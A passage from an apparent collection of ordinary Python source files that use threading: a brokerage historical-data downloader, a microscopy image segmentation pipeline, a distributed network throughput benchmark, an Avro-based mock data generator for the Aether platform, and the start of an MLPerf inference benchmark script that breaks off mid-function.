data = self._client.fetchHistoricalData(contract, endDataTime=endDateStr, durationStr=durationStr,
barSizeSetting=barSizeSetting, tickerId=counter)
historicData += data
counter = counter + 1
return historicData
def connect(self, ipaddress: str, port: int, clientId: int):
self._client.connect(ipaddress, port, clientId)
thread = Thread(target=self._client.run)
thread.start()
setattr(self, "_thread", thread)
self._wrapper.initError()
def disconnect(self):
if self._client:
self._client.disconnect()
def saveAsCsv(self, historicData, tickerName):
df = pandas.DataFrame(historicData, columns=['DateTime', 'Open', 'High', 'Low', 'Close', 'Volume'])
df['DateTime'] = pandas.to_datetime(df['DateTime'], unit='s').dt.tz_localize('UTC').dt.tz_convert('US/Eastern')
df.to_csv(f'{tickerName}.csv')
self.notify(f'Data has been saved as {tickerName}.csv')
def register(self, listener: Callable):
super().register(listener)
self._client.register(listener)
def unregister(self, listener: Callable):
super().unregister(listener)
self._client.unregister(listener)
if __name__ == '__main__':
app = BrokerClient("127.0.0.1", 4001, 2)
app.register(print)
contract = app.buildContract("AMD", "STK", "SMART", "USD")
fromDate = date(2020, 11, 1)
toDate = date(2020, 11, 11) # = date.today()
data = app.fetchHistoricalData(contract, fromDate, toDate, '1 min')
app.saveAsCsv(data, 'AMD')
app.disconnect()
|
segmentNucAndGFP.py | # segmentNucAndGFP.py
#######################################################
#
# Segmentation pipeline for :
# - Load original images
# - Detect lipid droplets (LDs) and nuclei
# - Save the "cleaned" images
#
#######################################################
import os
import cv2
import numpy as np
from scipy import ndimage
import multiprocessing
import Queue
import threading
import settings
import csv
## Thread
## Get the paths of the images and
## Process them to extract clean masks of the LDs and the nuclei
## Save the images as tif for later use in CellProfiler
def workerSeg():
while not q.empty():
currSubPath= q.get()
print ("%s\n" % currSubPath)
listFiles= [x for x in os.listdir(currSubPath) if x.endswith('.tif')]
gfpList=[x for x in listFiles if x.startswith("GFP")]
nucList=[x for x in listFiles if x.startswith("Hoechst")]
for gfpName in gfpList:
gfpPath=currSubPath+gfpName
idxPlate=gfpPath.rsplit('plate')
idxPlate= idxPlate[1].rsplit('/')
idxPlate= idxPlate[0].zfill(2)
idxWell=gfpPath.rsplit('Well ')
idxWell= idxWell[1].rsplit('/')
idxWell= idxWell[0]
print("Detecting P%s_%s\n"% (idxPlate, idxWell))
imgGFP = cv2.imread(gfpPath, -1)
cv2.imwrite(inputCellProfilerPath+'P'+idxPlate+'_'+idxWell+"_GFP.tif",imgGFP, [cv2.CV_16U])
imgMaskGFP=detectGFP(imgGFP, 20)
imgDet=imgMaskGFP*imgGFP
imgDet=imgDet.astype(np.uint16)
cv2.imwrite(outputDetPath +'P'+idxPlate+'_'+idxWell+"_GFP_CL.tif",imgDet, [cv2.CV_16U])
cv2.imwrite(outputDetPath +'P'+idxPlate+'_'+idxWell+"_GFP_MASK.tif",imgMaskGFP*255)
for nucName in nucList:
nucPath=currSubPath+nucName
print("%s in progress"% nucPath)
imgNUC=cv2.imread(nucPath, -1 )
imgMaskNUC=detectNucs(imgNUC, 40)
imgDet=imgMaskNUC*imgNUC
imgDet=imgDet.astype(np.uint16)
cv2.imwrite(outputDetPath +'P'+idxPlate+'_'+idxWell+"_NUC_MASK.tif",imgMaskNUC*255)
cv2.imwrite(outputDetPath +'P'+idxPlate+'_'+idxWell+"_NUC_CL.tif",imgDet, [cv2.CV_16U])
cv2.imwrite(inputCellProfilerPath+'P'+idxPlate+'_'+idxWell+"_NUC.tif",imgDet, [cv2.CV_16U])
## Function to detect lipid droplets in BODIPY channel ##
## Input: imgToProces: Image of LD
## typicDiam: Average diameter of lipid droplets /!\ Depend on the resolution
## Output: Image with cleaned LD
def detectGFP(imgToProces, typicDiam):
halfDiam= round(typicDiam/2)
# Clean the background
imgToProcNorm= norm255(imgToProces)
imgToProcNorm=np.uint8(imgToProcNorm)
ret,imgToProcOtsu = cv2.threshold(imgToProcNorm,0,255,cv2.THRESH_BINARY+cv2.THRESH_OTSU)
imgToProcOtsu[imgToProcOtsu>0]=1
cleanImage=imgToProcOtsu*imgToProces
# Enhance the edges
sigma = 0.6
img = cleanImage.max()-cleanImage
eigenimage = enhanceContrast(img, sigma)
eigenimage = eigenimage.max()-eigenimage
eigenimage[eigenimage<100]=0
eigenimage[eigenimage>0]=1
eigenimage= norm255(cleanImage)-norm255(eigenimage)
eigenimage[eigenimage<=0]=0
maskEigen=eigenimage.copy()
maskEigen[maskEigen>0]=1
# Enhance the droplets
TH1=TopHatBasic(cleanImage, typicDiam- halfDiam)
TH2=TopHatBasic(cleanImage, typicDiam )
TH3=TopHatBasic(cleanImage, typicDiam+ halfDiam)
THimage= TH1 +TH2 +TH3
THimage[THimage>0]=1
maskTH=THimage.copy()
maskTH[maskTH>0]=1
## Compute mask of the 2 enhancements; 1 values are the uncertainty
sumMask=maskTH+maskEigen
## We cleaned the uncertainty based on the intensity
T= sumMask.copy()
T[T==2]=0
T= norm255(T)
T=np.uint8(T)
Topen=ndimage.binary_opening(T, structure=np.ones((2,2))).astype(np.int)
Topen=Topen*imgToProces
Topen= norm255(Topen)
Topen=np.uint8(Topen)
H=(Topen[Topen>0])
ret,imgToProcOtsu = cv2.threshold(H,0,255,cv2.THRESH_BINARY+cv2.THRESH_OTSU)
TOtsu=Topen.copy()
TOtsu[TOtsu<ret]=0
TOtsu[TOtsu!=0]=1
finalMask=sumMask.copy()
finalMask[finalMask<2]=0
finalMask[finalMask!=0]=1
finalMask=finalMask+TOtsu
return finalMask
## Function to detect nuclei in Hoescht channel ##
## Input: imgToProces: Image of nuclei
## typicDiam: Average diameter of nuclei /!\ Depend on the resolution
## Output: Image with cleaned nuclei
def detectNucs(imgToProces, typicDiam):
halfDiam= round(typicDiam/2)
imgProc=TopHatBasic(imgToProces, typicDiam- halfDiam) + TopHatBasic(imgToProces, typicDiam) + TopHatBasic(imgToProces, typicDiam+ halfDiam)
imgProcNorm= norm255(imgProc)
imgProcNorm=np.uint8(imgProcNorm)
imgProcNorm[imgProcNorm>0]=1
imgProcOpen=ndimage.binary_opening(imgProcNorm, structure=np.ones((4,4))).astype(np.int)
return imgProcOpen
## Function of normalization [0;255] ##
## Input: Image to normalize
## Output: Normalized image
def norm255(ImgIn):
ImgIn= ImgIn.astype(float)
imgOut=((ImgIn-ImgIn.min())/(ImgIn.max()-ImgIn.min()))*255
return imgOut
## Modified New White Top Hat ##
## Enhanced dim bright spot and reduce local background
## Input: f : Image to process
## diamVal: Typical diameter for the filtering
## Output: Processed image
def TopHatBasic(f, diamVal):
nL=int(diamVal)
nW=int(diamVal)
nM=int(round(nW/7))
Bb = np.ones((nL,nL))
dB= np.ones((nW,nW))
dB[nM:nW-nM,nM:nW-nM]=0;
# White
dilatedI = ndimage.grey_dilation(f, footprint=dB)
blackSquare= ndimage.grey_erosion (dilatedI, footprint=Bb)
NCoi= np.minimum (blackSquare, f)
MNWTH= f- NCoi
return MNWTH
## Enhanced contrast curvature ##
## Enhanced edges and gap between LD
## Input: forimg : Image to process
## sigma: Sigma for the gaussian kernel
## Output: Processed image
def enhanceContrast(orimg,sigma):
Img = np.copy(orimg)
gau = gauss_kern2(Img, sigma)
Imgfft = np.fft.rfft2(Img)
gfft = np.fft.rfft2(gau)
fftimage = np.multiply(Imgfft, gfft)
Img_smooth =np.real(np.fft.ifftshift( np.fft.irfft2(fftimage)))
Iy, Ix = np.gradient(Img_smooth)
Ixy, Ixx = np.gradient(Ix)
Iyy, Iyx = np.gradient(Iy)
eigvallam = np.zeros((2,Ixx.shape[0],Ixx.shape[1] ))
trhessian = Ixx+Iyy
dethessian = Ixx*Iyy-Ixy*Ixy
eigvallam[0,:,:] = 0.5*(trhessian + np.sqrt(trhessian*trhessian - (4*dethessian) ))
eigvallam[1,:,:] = 0.5*(trhessian - np.sqrt(trhessian*trhessian - (4*dethessian) ))
eigh1 = eigvallam.min(0)
eigh2 = eigvallam.max(0)
etemp = np.copy(eigh1)
etemp = etemp-etemp.min()
etemp = etemp/etemp.max()
etemp = np.uint8(etemp*255)
return(etemp)
def gauss_kern2(Img, sigma):
""" Returns a normalized 2D gauss kernel array for convolutions """
h2,h1 = Img.shape
x, y = np.mgrid[0:h2, 0:h1]
x = x-h2/2
y = y-h1/2
g = np.exp( -( x**2 + y**2 ) / (2*sigma**2) );
return g / g.sum()
#################### Main ####################
def segmentFatDroplet(listPlates):
## Detection !
## Initialise variables
global q
global inputCellProfilerPath
global outputDetPath
global list4CP
## Initialise paths
inputDataPath=settings.pathList[1]
outputDetPath=settings.pathList[3]
inputCellProfilerPath=settings.pathList[4]
## Initialise threads
nProc = multiprocessing.cpu_count()
threadsList = [threading.Thread(target=workerSeg) for i in range(0, nProc)]
q = Queue.Queue()
## Fill up the queue for threading
for currFolder in listPlates:
currPath=inputDataPath+str(currFolder)+"/"
idxSpace=currFolder.rsplit('plate')
currFolder=idxSpace[1]
listSubFolder= [x for x in os.listdir(currPath) if os.path.isdir(currPath+x)]
for currSubFolder in listSubFolder:
currSubPath=currPath+ str(currSubFolder)+"/"
q.put(currSubPath)
# start all threads
for thread in threadsList:
thread.start()
# join all threads
for thread in threadsList:
thread.join()
## Get the paths of the processed images
list4CP=[]
listImages= [x for x in os.listdir(inputCellProfilerPath) if x.endswith('_GFP.tif')]
listSubImages=[[x.rsplit('_')[0]+'_'+x.rsplit('_')[1]+'_GFP.tif'] + [x.rsplit('_')[0]+'_'+x.rsplit('_')[1]+'_NUC.tif'] for x in listImages]
listSubImages= [item for sublist in listSubImages for item in sublist]
## Export paths for input in CellProfiler
list4CP = [[os.path.abspath(inputCellProfilerPath+x)] for x in listSubImages]
list4CP=sorted(list4CP, key=lambda x: x[0])
with open(inputCellProfilerPath + "CellProfilerInput.csv",'wb') as csvfile:
writer= csv.writer(csvfile, dialect='unixpwd')
for i in range(0, len(list4CP)):
content=list4CP[i]
writer.writerow(content) |
network_benchmark_rate_basic.py | import requests
import time
import json
import pdb
import random
import optparse
import threading
import sys
import os
def jsonPrint(r):
"""Pretty-print JSON"""
return json.dumps(r.json(), indent=4, sort_keys=True) + "\n"
def ordered(obj):
"""Order map for comparison
https://stackoverflow.com/questions/25851183/
"""
if isinstance(obj, dict):
return sorted((k, ordered(v)) for k, v in obj.items())
if isinstance(obj, list):
return sorted(ordered(x) for x in obj)
else:
return obj
def HTTPpost(endpoint, page, jsonArg="{}"):
"""Make HTTP post"""
return requests.post('http://{ip}:{port}/{page}'.format(
ip=endpoint["IP"], port=endpoint["HTTPPort"], page=page), json=jsonArg)
threads = []
def HTTPpostAsync(endpoint, page, jsonArg="{}"):
thread = threading.Thread(target=HTTPpost, args=(endpoint, page, jsonArg))
thread.start()
threads.append(thread)
# Will act as controlling node if used
masterEndpoint = {"HTTPPort": 8080, "TCPPort": 9080, "IP": "localhost"}
usingMasterNode = False
# localhost test
#endpoint1 = {"HTTPPort": 8083, "TCPPort": 9083, "IP": "localhost"}
#endpoint2 = {"HTTPPort": 8081, "TCPPort": 9081, "IP": "localhost"}
#endpoint3 = {"HTTPPort": 8082, "TCPPort": 9082, "IP": "localhost"}
#allEndpoints = [ endpoint1, endpoint2, endpoint3]
#activeEndpoints = [ endpoint1, endpoint2, endpoint3]
# cloud test basic
#endpoint1 = {"HTTPPort": 8080, "TCPPort": 9080, "IP": "35.204.38.91"}
#endpoint2 = {"HTTPPort": 8080, "TCPPort": 9080, "IP": "35.204.60.187"}
#allEndpoints = [ endpoint1, endpoint2]
# google cloud test
endpoint1 = {"HTTPPort": 8080, "TCPPort": 9080, "IP": "35.204.38.91"}
endpoint2 = {"HTTPPort": 8080, "TCPPort": 9080, "IP": "35.204.60.187"}
endpoint3 = {"HTTPPort": 8080, "TCPPort": 9080, "IP": "35.234.64.165"}
endpoint4 = {"HTTPPort": 8080, "TCPPort": 9080, "IP": "35.234.132.50"}
# endpoint5 = {"HTTPPort": 8080, "TCPPort": 9080, "IP": "35.227.63.152"} # America
allEndpoints = [endpoint1, endpoint2, endpoint3, endpoint4]
# Endpoints that are transmitting
activeEndpoints = [
endpoint1,
endpoint2,
endpoint3,
endpoint4
]
# Global config
numberOfNodes = len(allEndpoints)
txSize = 2000 # bytes
txPerCall = 10000
txToSync = txPerCall * 15
totalSize = txToSync * numberOfNodes * txSize
print "Total size on each node after sync: ", totalSize / 1000000, " MB"
transactionSize = {"transactionSize": txSize}
transactionsPerCall = {"transactions": txPerCall}
transactionsToSync = {"transactionsToSync": txToSync}
stopCondition = {
"stopCondition": int(
txToSync /
txPerCall) *
len(activeEndpoints)}
for endpoint in allEndpoints:
HTTPpost(endpoint, 'reset')
# Set up connections to each other (circular topology)
# for i in range(len(allEndpoints)):
# if (i == len(allEndpoints)-1):
# HTTPpost(allEndpoints[i], 'add-endpoint', allEndpoints[0])
# else:
# HTTPpost(allEndpoints[i], 'add-endpoint', allEndpoints[i+1])
# Fully connected topology
for endpoint in allEndpoints:
for otherEndpoint in allEndpoints:
if(endpoint != otherEndpoint):
HTTPpost(endpoint, 'add-endpoint', otherEndpoint)
# Other setup parameters
for endpoint in allEndpoints:
HTTPpost(endpoint, 'transaction-size', transactionSize)
HTTPpost(endpoint, 'transactions-per-call', transactionsPerCall)
HTTPpost(endpoint, 'stop-condition', stopCondition)
for endpoint in activeEndpoints:
HTTPpostAsync(endpoint, 'transactions-to-sync', transactionsToSync)
# Need to make sure everyone is ready before starting
for t in threads:
t.join()
# master has all endpoints, set it up
if (usingMasterNode):
for endpoint in allEndpoints:
HTTPpost(endpoint, 'is-slave', "{}")
HTTPpost(masterEndpoint, 'add-endpoint', endpoint)
epoch_time = int(time.time())
timeWait = 3
threeSecondsTime = {"startTime": epoch_time + timeWait}
# Set up the start time
for endpoint in allEndpoints:
HTTPpostAsync(endpoint, 'start-time', threeSecondsTime)
if (usingMasterNode):
HTTPpostAsync(masterEndpoint, 'start-test-as-master', threeSecondsTime)
time.sleep(3)
# wait until they're probably done
while(True):
time.sleep(7)
hashPages = [HTTPpost(i, 'finished').json()["finished"] == True
for i in allEndpoints]
print "Finished : ", hashPages
if(sum(hashPages) == len(hashPages)):
break
# Get the time each node took to synchronise
pages = []
maxTime = 0
for endpoint in allEndpoints:
pageTemp = HTTPpost(endpoint, 'time-to-complete')
print jsonPrint(pageTemp)
if(pageTemp.json()["timeToComplete"] > maxTime):
maxTime = pageTemp.json()["timeToComplete"]
pages += pageTemp
if (usingMasterNode):
pageTemp = HTTPpost(masterEndpoint, 'time-to-complete')
print jsonPrint(pageTemp)
if(pageTemp.json()["timeToComplete"] > maxTime):
maxTime = pageTemp.json()["timeToComplete"]
pages += pageTemp
print "Max time: ", maxTime
TPS = (txToSync * numberOfNodes) / maxTime
print "Transactions per second: ", TPS
print "Transactions per second per node: ", TPS / numberOfNodes
print "Mbits/s", (TPS * txSize * 8) / 1000000
print "Mbits/s per node", (TPS * txSize * 8) / 1000000 / numberOfNodes
exit(1)
# Check that they have synchronised correctly
print "inspecting the hashes (may take a long time)"
hashPages = []
hashes = [ordered(HTTPpost(i, 'transactions-hash').json())
for i in allEndpoints]
#hashes = [1, 1]
comparison = [x == hashes[0] for x in hashes]
if(all(comparison) == False):
print "FAILED TO MATCH: "
print hashes
res = [HTTPpost(i, 'transactions').json() for i in allEndpoints]
for r in res:
for i in r:
print i
print ""
else:
print "Hashes matched!"
print hashes[0]
|
mocker.py | # Copyright (C) 2018 by eHealth Africa : http://www.eHealthAfrica.org
#
# See the NOTICE file distributed with this work for additional information
# regarding copyright ownership.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import collections
from collections import namedtuple
import json
import logging
from queue import Queue, Empty
import os
from random import randint, uniform, choice, sample
import signal
import string
from threading import Thread
from time import sleep
from uuid import uuid4
log = logging.getLogger(__name__)
log.setLevel(logging.DEBUG)
from aether.client import KernelClient
class Generic(object):
'''
We keep our default mocking functions for each type here as generic
'''
@staticmethod
def boolean():
return choice([True, False])
@staticmethod
def float():
return uniform(.01, 1000.00)
@staticmethod
def int():
return randint(1, 99999)
@staticmethod
def null():
return None
@staticmethod
def string():
size = choice(range(3, 12))
return "".join(sample(string.ascii_lowercase, size))
@staticmethod
def uuid():
return str(uuid4())
@staticmethod
def geo_lat():
return uniform(0.00000000000, 60.00000000000)
@staticmethod
def geo_lng():
return uniform(0.00000000000, 180.00000000000)
class DataMocker(object):
'''
An extensible tool that consumes an Avro Schema and creates junk data that matches it.
Data generation methods can be overridden on a per type [text, int, etc] basis via:
override_type(type_name, fn)
Override methods can also be passed on a property name basis [lat, lon, name] via:
override_property(property_name, fn)
'''
def __init__(self, name, schema, parent):
self.MAX_ARRAY_SIZE = 4
self.QUEUE_WORKERS = 10
self.REUSE_COEFFICIENT = 0.85
self.name = name
self.raw_schema = schema
self.parent = parent
self.subschema = {}
self.primative_types = [
"null",
"boolean",
"int",
"long",
"float",
"double",
"bytes",
"string"
]
self.type_methods = {
primative: MockFn(self._default(primative))
for primative in self.primative_types
}
self.created = [] # ids of created entities
self.reuse = 0 # number of recycled entity ids
self.count = 0 # number of entity references to this type
self.property_methods = {}
self.required = []
self.ignored_properties = []
self.restricted_types = {}
self.instructions = {}
self.killed = False
self._queue = Queue()
self.__start_queue_process()
self.override_property("id", MockFn(Generic.uuid))
self.load()
def _default(self, primative):
if primative in ["int", "long"]:
return Generic.int
if primative in ["float", "double"]:
return Generic.float
if primative is "null":
return Generic.null
if primative is "string":
return Generic.string
if primative is "boolean":
return Generic.boolean
def kill(self):
self.killed = True
def __start_queue_process(self):
for x in range(self.QUEUE_WORKERS):
worker = Thread(target=self.__reference_runner, args=[])
worker.daemon = False
worker.start()
def __reference_runner(self):
while True:
if self.killed:
break
try:
fn = self._queue.get(block=True, timeout=1)
fn()
except Empty as emp:
if self.killed:
break
sleep(1)
except Exception as err:
raise err
def get_reference(self, exclude=None):
# called from other types to generate this one (lazily)
# returns an ID, either of by registering a new instance
# or by returning a value from created
self.count += 1
thresh = 0 if self.count <= 100 else (100 * self.REUSE_COEFFICIENT)
new = (randint(0, 100) >= thresh)
if new:
_id = self.quick_reference()
else:
items = self.created[:-4]
if items:
self.reuse += 1
_id = choice(items)
else:
_id = self.quick_reference()
return _id
def quick_reference(self):
# generates an id for this type
# queues a job to actually make the instance
_id = None
if self.property_methods.get('id'):
fn = self.property_methods.get('id')
_id = fn()
else:
fn = [fn for name, fn in self.instuctions.get(
self.name) if name == 'id']
if not fn:
raise ValueError("Couldn't find id function")
_id = fn[0]()
deffered_generation = MockFn(self.fullfill_reference, [_id])
self._queue.put(deffered_generation)
return _id
def fullfill_reference(self, _id):
# the method called from the queue to create an instance
new_record = self.get(set_id=_id)
self.parent.register(self.name, new_record)
return _id
def get(self, record_type="default", set_id=None):
# Creates a mock instance of this type
# wraps _get
if record_type is "default":
body = self._get(self.name)
if set_id:
body['id'] = set_id
self.created.append(body.get('id'))
return body
else:
return self._get(record_type)
def _get(self, name):
# actually compiles the instruction set for this type and returns the body
instructions = self.instructions.get(name)
if not instructions:
alt = self.parent.names.get(name)
instructions = self.instructions.get(alt)
if not instructions:
raise ValueError("No instructions for type %s" % name)
body = {}
for name, fn in instructions:
body[name] = fn()
return body
def gen(self, _type):
# generation of avro types
return self.type_methods.get(_type)
def gen_array(self, _type):
# generation of an array of any type
fn = self.gen(_type)
return MockFn(self._gen_array, [fn])
def _gen_array(self, fn):
size = choice(range(2, self.MAX_ARRAY_SIZE))
return [fn() for i in range(size)]
def gen_random_type(self, name=None, _types=None):
if _types is None:
_types = []
return MockFn(self._gen_random_type, [name, _types])
def _gen_random_type(self, name, types):
# picks on of the valid types available for the field and completes it
if name in self.required:
types = [i for i in types if i != "null"]
_type = choice(types)
fn = None
if isinstance(_type, dict):
if _type.get("type", None) != "array":
raise ValueError("unexpected type, %s" % _type.get('type'))
items = _type.get("items")
fn = self.gen_array(items)
return fn()
elif isinstance(_type, list):
if name in self.required:
_type = [i for i in _types if i != "null"]
_type = choice(_type)
if not _type in self.primative_types:
fn = self.gen_complex(_type)
else:
fn = self.gen(_type)
return fn()
def gen_complex(self, _type):
return MockFn(self._gen_complex, _type)
def _gen_complex(self, name):
# handles generation of associated types
try:
return self._get(name)
except ValueError as verr:
fn = self.gen("null")
return fn()
def gen_reference(self, name, _type, types):
# gets a reference to a foreign type
# usually triggers creation via the other types get_reference()
return MockFn(self._gen_reference, [name, _type, types])
def _gen_reference(self, name, _type, types):
if name in self.required:
types = [i for i in types if i != "null"]
chosen = choice(types)
if isinstance(chosen, str):
return self.parent.get_reference(_type)
else:
size = choice(range(2, self.MAX_ARRAY_SIZE))
return [self.get_reference(_type) for i in range(size)]
def ignore(self, property_name):
# turn off mocking for this property
self.ignored_properties.append(property_name)
def override_type(self, type_name, fn):
# provide an override method for an avro type
# fn is a MockFn object
self.type_methods[type_name] = fn
self.load()
def override_property(self, property_name, fn):
# overrides a property in this type by name with a new function
# for example instead of returning a random string for the name field, pick for a list
# fn is a MockFn object
self.property_methods[property_name] = fn
self.load()
def load(self):
# loads schema definition for this type
self.schema = json.loads(self.raw_schema)
if isinstance(self.schema, list):
for obj in self.schema:
self.parse(obj)
else:
self.parse(self.schema)
def parse(self, schema):
# looks at all the types called for
# matches simple types to type_methods
# stubs external calls to parent for linked types
name = schema.get("name")
instructions = []
fields = schema.get("fields", [])
for field in fields:
instructions.append(self._comprehend_field(field))
self.instructions[name] = instructions
for i in self.instructions[name]:
log.debug("Add instruction to %s : %s" % (name, i))
def _comprehend_field(self, field):
# picks apart an avro definition of a field and builds mocking functions
name = field.get("name")
if name in self.ignored_properties:
return (name, self.gen("null")) # Return null function and get out
try:
ref_type = field.get("jsonldPredicate").get("_id")
types = field.get('type')
# This is a reference property # TODO THIS MIGHT WANT TO BE sub_type
return (name, self.gen_reference(name, ref_type, types))
except Exception as err:
pass # This is simpler than checking to see if this is a dictionary?
if name in self.property_methods.keys():
# We have an explicit method for this
return (name, self.property_methods.get(name))
types = field.get("type")
if isinstance(types, str):
return (name, self.gen(types)) # Single type for this field
if name in self.restricted_types.keys(): # we've limited the types we want to mock
types = list(set(types).union(
set(self.restricted_types.get(name))))
return tuple([name, self.gen_random_type(name, types)])
def require(self, *property):
# Make a field never resolve to null (if null is an option)
if isinstance(property, list):
self.required.extend(property)
else:
self.required.append(property)
def restrict_type(self, property_name, allowable_types=None):
# some properties can be completed by multiple types of properties
# for example [null, int, string[]?].
# restrict_type allows you to chose a subset of the permitted types for mocking
if allowable_types is None:
allowable_types = []
self.restricted_types[property_name] = allowable_types
class MockFn(namedtuple("MockFn", ("fn", "args"))):
# Function wrapper class containing fn and args
def __new__(cls, fn, args=None):
this = super(MockFn, cls).__new__(cls, fn, args)
return this
def __call__(self):
if self.args and not isinstance(self.args, list):
return self.fn(self.args)
try: # This lets us get very duck-type-y with the passed functions
return self.fn(*self.args) if self.args else self.fn()
except TypeError as terr:
return self.fn(self.args)
class MockingManager(object):
def __init__(self, kernel_url=None, kernel_credentials=None):
# connects to Aether and gets available schemas.
# constructs a DataMocker for each type
if not kernel_url:
kernel_url = "http://kernel.aether.local:8000/v1"
if not kernel_credentials:
kernel_credentials = {
"username": os.environ['KERNEL_ADMIN_USERNAME'],
"password": os.environ['KERNEL_ADMIN_PASSWORD']
}
self.client = KernelClient(kernel_url, **kernel_credentials)
self.types = {}
self.alias = {}
self.names = {}
self.project_schema = {}
self.schema_id = {}
self.type_client = {}
self.type_count = {}
signal.signal(signal.SIGTERM, self.kill)
signal.signal(signal.SIGINT, self.kill)
self.load()
def get(self, _type):
if not _type in self.types.keys():
msg = "No schema for type %s" % (_type)
log.error(msg)
raise KeyError(msg)
return self.types.get(_type).get()
def get_reference(self, _type):
if not _type in self.types.keys():
msg = "No schema for type %s" % (_type)
log.error(msg)
raise KeyError(msg)
return self.types.get(_type).get_reference()
def kill(self, *args, **kwargs):
for name, mocker in self.types.items():
log.info("Stopping thread for %s" % name)
mocker.kill()
def register(self, name, payload=None):
# register an entity of type 'name'
# if no payload is passed, an appropriate one will be created
count = self.type_count.get(name, 0)
count += 1
self.type_count[name] = count
if not payload:
payload = self.types[name].get()
type_name = self.alias.get(name)
type_id = self.schema_id.get(name)
ps_id = self.project_schema.get(type_id)
data = self.payload_to_data(ps_id, payload)
res = self.type_client[type_name].submit(data)
log.debug("Created instance # %s of type %s" % (self.type_count[name], name))
return data
def payload_to_data(self, ps_id, payload):
# wraps data in expected aether jargon for submission
data = {
"id": payload['id'],
"payload": payload,
"projectschema": ps_id,
"revision": 1,
"status": "Publishable"
}
return data
def load(self):
# loads schemas and project schemas from aether client
log.debug("Loading schemas from Aether Kernel")
for schema in self.client.Resource.Schema:
name = schema.get("name")
log.debug("Loading schema for type %s \n%s" % (name, schema))
_id = schema.get('id')
definition = schema.get('definition')
if isinstance(definition, str):
definition = json.loads(definition)
if isinstance(definition, list):
full_name = [obj.get("name") for obj in definition if obj.get(
'name').endswith(name)][0]
else:
full_name = definition.get('name')
namespace = definition.get('namespace')
if namespace:
if not name in namespace:
full_name = namespace+"."+name
self.types[full_name] = DataMocker(
full_name, json.dumps(definition), self)
self.names[name] = full_name
self.names[full_name] = name
self.types[name] = self.types[full_name]
self.alias[full_name] = name
self.alias[name] = full_name
self.schema_id[name] = _id
self.schema_id[full_name] = _id
self.schema_id[_id] = name
self.type_client[name] = self.client.Entity.get(name, strict=False)
for ps in self.client.Resource.ProjectSchema:
schema_id = ps.get('schema')
_id = ps.get('id')
self.project_schema[schema_id] = _id
self.project_schema[_id] = schema_id
|
Runner.py | import threading
class Runner:
def __init__(self):
pass
@staticmethod
def run(launcher, *args):
t = threading.Thread(target=launcher.run, args=args, name=launcher.__class__)
t.setDaemon(True)
t.start()
return t
|
main.py | """
mlperf inference benchmarking tool
"""
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import argparse
import json
import logging
import os
import threading
import time
from queue import Queue
import mlperf_loadgen as lg
import numpy as np
import dataset
import imagenet
import coco
logging.basicConfig(level=logging.INFO)
log = logging.getLogger("main")
NANO_SEC = 1000000000
MILLI_SEC = 1000
# pylint: disable=missing-docstring
# the datasets we support
SUPPORTED_DATASETS = {
"imagenet":
(imagenet.Imagenet, dataset.pre_process_vgg, dataset.PostProcessCommon(offset=-1),
{"image_size": [224, 224, 3]}),
"imagenet_mobilenet":
(imagenet.Imagenet, dataset.pre_process_mobilenet, dataset.PostProcessArgMax(offset=-1),
{"image_size": [224, 224, 3]}),
"coco":
(coco.Coco, dataset.pre_process_coco_mobilenet, coco.PostProcessCoco(),
{"image_size": [-1, -1, 3]}),
}
# pre-defined command line options so simplify things. They are used as defaults and can be
# overwritten from command line
DEFAULT_LATENCY_BUCKETS = "0.010,0.050,0.100,0.200,0.400"
SUPPORTED_PROFILES = {
"defaults": {
"dataset": "imagenet",
"backend": "tensorflow",
"cache": 0,
"time": 128,
"max-latency": DEFAULT_LATENCY_BUCKETS,
},
# resnet
"resnet50-tf": {
"inputs": "input_tensor:0",
"outputs": "ArgMax:0",
"dataset": "imagenet",
"backend": "tensorflow",
},
"resnet50-onnxruntime": {
"dataset": "imagenet",
"outputs": "ArgMax:0",
"backend": "onnxruntime",
},
# mobilenet
"mobilenet-tf": {
"inputs": "input:0",
"outputs": "MobilenetV1/Predictions/Reshape_1:0",
"dataset": "imagenet_mobilenet",
"backend": "tensorflow",
},
"mobilenet-onnx": {
"dataset": "imagenet_mobilenet",
"outputs": "MobilenetV1/Predictions/Reshape_1:0",
"backend": "onnxruntime",
},
# ssd-mobilenet
"ssd-mobilenet-tf": {
"inputs": "image_tensor:0",
"outputs": "num_detections:0,detection_boxes:0,detection_scores:0,detection_classes:0",
"dataset": "coco",
"backend": "tensorflow",
},
"ssd-mobilenet-onnxruntime": {
"dataset": "coco",
"outputs": "num_detections:0,detection_boxes:0,detection_scores:0,detection_classes:0",
"backend": "onnxruntime",
"data-format": "NHWC",
},
}
last_timeing = None
def get_args():
"""Parse commandline."""
parser = argparse.ArgumentParser()
parser.add_argument("--dataset", choices=SUPPORTED_DATASETS.keys(), help="dataset")
parser.add_argument("--dataset-path", required=True, help="path to the dataset")
parser.add_argument("--dataset-list", help="path to the dataset list")
parser.add_argument("--data-format", choices=["NCHW", "NHWC"], help="data format")
parser.add_argument("--profile", choices=SUPPORTED_PROFILES.keys(), help="standard profiles")
parser.add_argument("--model", required=True, help="model file")
parser.add_argument("--inputs", help="model inputs")
parser.add_argument("--output", help="test results")
parser.add_argument("--outputs", help="model outputs")
parser.add_argument("--backend", help="runtime to use")
parser.add_argument("--threads", default=os.cpu_count(), type=int, help="threads")
parser.add_argument("--time", type=int, help="time to scan in seconds")
parser.add_argument("--count", type=int, help="dataset items to use")
parser.add_argument("--qps", type=int, default=10, help="target qps") # TODO: remove once we have qps scan
parser.add_argument("--max-latency", type=str, help="max latency in 99pct tile")
parser.add_argument("--cache", type=int, default=0, help="use cache")
args = parser.parse_args()
# don't use defaults in argparser. Instead we default to a dict, override that with a profile
# and take this as default unless command line give
defaults = SUPPORTED_PROFILES["defaults"]
if args.profile:
profile = SUPPORTED_PROFILES[args.profile]
defaults.update(profile)
for k, v in defaults.items():
kc = k.replace("-", "_")
if getattr(args, kc) is None:
setattr(args, kc, v)
if args.inputs:
args.inputs = args.inputs.split(",")
if args.outputs:
args.outputs = args.outputs.split(",")
if args.max_latency:
args.max_latency = [float(i) for i in args.max_latency.split(",")]
return args
def get_backend(backend):
if backend == "tensorflow":
from backend_tf import BackendTensorflow
backend = BackendTensorflow()
elif backend == "onnxruntime":
